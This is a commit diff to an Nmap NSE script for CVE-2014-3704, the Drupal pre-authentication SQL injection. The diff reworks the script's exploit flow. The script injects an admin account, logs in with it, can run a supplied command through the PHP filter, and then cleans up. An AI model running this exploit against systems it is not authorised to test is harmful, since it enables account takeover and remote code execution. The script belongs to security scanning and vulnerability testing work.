Improves detection of cve-2014-3704. Fixes #902. Closes #905.

2025-12-06 04:31:29 +00:00 · 2017-07-08 03:11:45 +00:00
parent d1e8388b7e
commit 30f0fab5bc
1 changed files with 44 additions and 29 deletions
--- a/scripts/http-vuln-cve2014-3704.nse
+++ b/scripts/http-vuln-cve2014-3704.nse
@@ -216,11 +216,13 @@ local function do_sql_query(host, port, uri, user)
    }
  }
  local res = http.post(host, port, uri .. "?q=/user/login", opt, nil, r)
-  --TODO: Check return status

+  if string.match(res.body, "includes[\\/]database[\\/]database%.inc") and string.match(res.body, "addcslashes%(%)") then
    return user, passwd
  end

+end
+
 local function set_php_filter(host, port, uri, session, disable)

  -- enable PHP filter
@@ -342,19 +344,6 @@ action = function(host, port)
    cleanup = "false"
  end

-  local user, passwd = do_sql_query(host, port, uri, nil)
-
-  stdnse.debug(1, string.format("logging in as admin user (username: '%s'; passwd: '%s')", user, passwd))
-  local data = {
-    ['name'] = user,
-    ['pass'] = passwd,
-    ['form_id'] = 'user_login',
-    ['op'] = 'Log in',
-  }
-
-  local res = http.post(host, port, uri .. "?q=/user/login", nil, nil, data)
-
-  if res.status == 302 and res.cookies[1].name ~= nil then
  local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port)
  local vuln = {
    title = 'Drupal - pre Auth SQL Injection Vulnerability',
@@ -375,9 +364,30 @@ attacks via an array containing crafted keys.
      disclosure = {year = '2014', month = '10', day = '15'},
    },
  }
-    stdnse.debug(1, string.format("logged in as admin user (username: '%s'; passwd: '%s'). Target is vulnerable.", user, passwd))
+
+  local user, passwd = do_sql_query(host, port, uri, nil)
+
+  if user == nil or passwd == nil then
+    return vulnReport:make_output(vuln)
+  end
+
+  stdnse.debug(1, string.format("logging in as admin user (username: '%s'; passwd: '%s')", user, passwd))
+
  vuln.state = vulns.STATE.EXPLOIT

+  local data = {
+    ['name'] = user,
+    ['pass'] = passwd,
+    ['form_id'] = 'user_login',
+    ['op'] = 'Log in',
+  }
+
+  local res = http.post(host, port, uri .. "?q=/user/login", nil, nil, data)
+
+  if res.status == 302 and res.cookies[1].name ~= nil then
+
+    stdnse.debug(1, string.format("logged in as admin user (username: '%s'; passwd: '%s'). Target is vulnerable.", user, passwd))
+
    if cmd ~= nil then
      local session = {}
      session.name = res.cookies[1].name
@@ -406,11 +416,16 @@ attacks via an array containing crafted keys.
      end
    end

+  else
+    vuln.state = vulns.STATE.LIKELY_VULN
+    vuln.check_results = "Account created but unable to log in."
+  end
+
  -- cleanup: remove admin user
  if cleanup == nil then
    do_sql_query(host, port, uri, user)
  end

  return vulnReport:make_output(vuln)
-  end
+
 end